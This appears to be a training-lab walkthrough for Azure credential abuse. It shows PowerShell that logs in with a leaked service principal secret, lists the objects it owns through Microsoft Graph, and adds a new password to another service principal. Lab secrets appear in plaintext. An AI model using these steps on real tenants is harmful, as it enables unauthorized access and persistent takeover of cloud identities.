🟢Learning Objective 11

Azure Credentials Abuse

Task

In the Attack Lab:

Login using the existing service principal credentials that were extracted from resources application.
Check if the service principal has any ownership rights on any other enterprise app.
Add credentials to the enterprise app on which the current service principal has permissions.

Applies to: Attack Lab

Topic Covered: Credential Abuse

Info from Objective 4

ClientSecret: 7e7730b1-29ab-4adf-bb20-7ae61987d01f
Password: ~9j8Q~f339gnUfSBxSO5yuQXM6ztfCBL8LPjXa3I

$password = ConvertTo-SecureString '~9j8Q~f339gnUfSBxSO5yuQXM6ztfCBL8LPjXa3I' -AsPlainText -Force

$creds = New-Object System.Management.Automation.PSCredential('7e7730b1-29ab-4adf-bb20-7ae61987d01f', $password)

Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant e0f999c1-86ee-47a0-bfd5-18470154b7cd

Get-AzADApplication

$password = ConvertTo-SecureString '~9j8Q~f339gnUfSBxSO5yuQXM6ztfCBL8LPjXa3I' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('7e7730b1-29ab-4adf-bb20-7ae61987d01f',$password)
Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant e0f999c1-86ee-47a0-bfd5-18470154b7cd

Get-AzADApplication

$GraphToken = (Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
$Params = @{
 "URI" = "https://graph.microsoft.com/v1.0/servicePrincipals/e0c80e68-d141-4bd4-9bba-37b0bd58a48b/ownedObjects"
 "Method" = "GET"
 "Headers" = @{
 "Authorization" = "Bearer $GraphToken"
 "Content-Type" = "application/json"
 }
 }
$Result = Invoke-RestMethod @Params -UseBasicParsing
$Result.value

$GraphToken = (Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
$URL = "https://graph.microsoft.com/v1.0/servicePrincipals/4a9a9c00-bf17-43d8-b437-fe8144c8df15/addPassword"
$Params = @{
 "URI" = $URL
 "Method" = "POST"
 "Headers" = @{
 "Content-Type" = "application/json"
 "Authorization" = "Bearer $GraphToken"
 }
}
$Body = @{
 "passwordCredential"= @{
 "displayName" = "Password"
 }
}
Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json)

$GraphToken = (Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
$URL = "https://graph.microsoft.com/v1.0/servicePrincipals/4a9a9c00-bf17-43d8-b437-fe8144c8df15/addPassword"
$Params = @{
 "URI" = $URL
 "Method" = "POST"
 "Headers" = @{
 "Content-Type" = "application/json"
 "Authorization" = "Bearer $GraphToken"
 }
}
$Body = @{
 "passwordCredential"= @{
 "displayName" = "Password"
 }
}
Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json) 


$GraphToken = (Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
$URL = "https://graph.microsoft.com/v1.0/servicePrincipals/4a9a9c00-bf17-43d8-b437-fe8144c8df15/addPassword"




$Params = @{ 
    "URI" = $URL
    "Method" = "POST"
    "Headers" = @{
    "Content-Type" = "application/json"
    "Authorization" = "Bearer $GraphToken"
}
}
$Body = @{"passwordCredential"= @{"displayName" = "Password"}}

Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json)

keyId               : 2f432c5d-d9fc-4bef-9325-12a5ad0a0d0e
secretText          : Tey8Q~S3o84UUg7I_ZAIk7DYI4eNCYE5hy1auaoa

PreviousLearning Objective 10 NextLearning Objective 12

Last updated 10 months ago

Was this helpful?